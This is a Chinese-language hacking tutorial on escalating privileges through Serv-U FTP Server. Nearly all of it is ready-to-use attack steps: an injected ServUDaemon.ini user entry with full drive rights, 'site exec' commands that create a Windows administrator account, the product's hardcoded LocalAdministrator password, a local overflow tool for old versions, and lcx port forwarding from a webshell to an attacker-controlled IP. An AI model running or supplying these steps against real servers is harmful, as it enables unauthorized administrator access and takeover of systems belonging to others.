0x00 serv-u簡介
- Serv-U FTP Server,是一種被廣泛運用的FTP服務器端軟件,支持3x/9x/ME/NT/2K等全Windows系列。可以設定多個FTP服務器、限定登錄用戶的權限、登錄主目錄及空間大小等
- serv-u默認安裝目錄:C:\Program Files\rhinosoft.com\serv-U
- serv-u密碼文件:ServUDaemon.ini
- 端口號:默認端口是43958
ServUDaemon.ini中lccalsetuportNo=端口
0x01 FTP提權方法
1、有修改權限
2、無權限修改
3、serv-u ftp本地溢出權限提升(使用6.0以及以前版本)
4、serv-u ftp轉發端口
0x02 有修改權限
步驟如下:
1、判斷是否安裝serv-u
nmap掃端口確認
2、檢查是否有可寫權限
一般安裝目錄 c:\Program Files\Serv-u\SerUDaemon.ini
3、在serv-u中添加用戶
在user4=添加一個系統用戶
[USER=quan|1] //用戶名
Password= //用戶密碼加密后的密文
HomeDir=c:\ftp\quan //目錄
RelPaths=3
TimeOut=600 //超時時間設置
Maintenance=System //權限
Access1=C:\|RWAMELCDP //可訪問的目錄及權限
Access2=d:\|RWAMELCDP //可訪問的目錄及權限
Access3=e:\|RWAMELCDP //可訪問的目錄及權限
SKEYValues=
password=2位隨機字符+md5(2位隨機字符+123456)
4、連接目標FTP服務器
ftp 目標IP地址 剛添加的用戶密碼
5、利用ftp命令quote site exec 添加用戶加入administrators權限組
quote site exec net user quan quan123 /add
quote site exec net localgroup administrators quan /add
0x03 無修改權限
1、利用md5 直接去解密
2、默認用戶名密碼
賬戶:LocalAdministrator ,密碼:#l@$ak#.lk;0@P
命令:
cmd /c net user quan quan123 /add & net localgroup administrators quan /add
3、不是默認密碼時
直接把SerUAdmin.exe 下載下來
用winhex打開查找LocalAdministrator(選擇ANSI字符)進行查找密碼
0x04 serv-u ftp本地溢出權限提升(使用6.0以及以前版本)
步驟如下:
1、用Serv-U提權綜合工具生成提權工具serv_u.exe
2、先上傳 serv_u.exe 到一個盤符下
比如是d盤
3、執行命令
d:\serv_u.exe
d:\serv_u.exe “net user quan quan123 /add”
d:\serv_u.exe “net localgroup administrators quan /add”
注意命令要有引號
0x05 serv-u ftp轉發端口
1、lcx端口轉發
在目標Webshell上運行LCX命令
lcx -slave yourIP 5000 127.0.0.1 43958
在本機上運行
lcx -listen 5000 21
2、本機登陸Serv_U
打開本地的SERV_U 在IP上填入127.0.0.1
帳號寫LocalAdministrator 密碼#l@$ak#.lk;0@P
0x06 參考
https://blog.csdn.net/God_XiangYu/article/details/99692269
https://www.cnblogs.com/feizianquan/p/10891352.html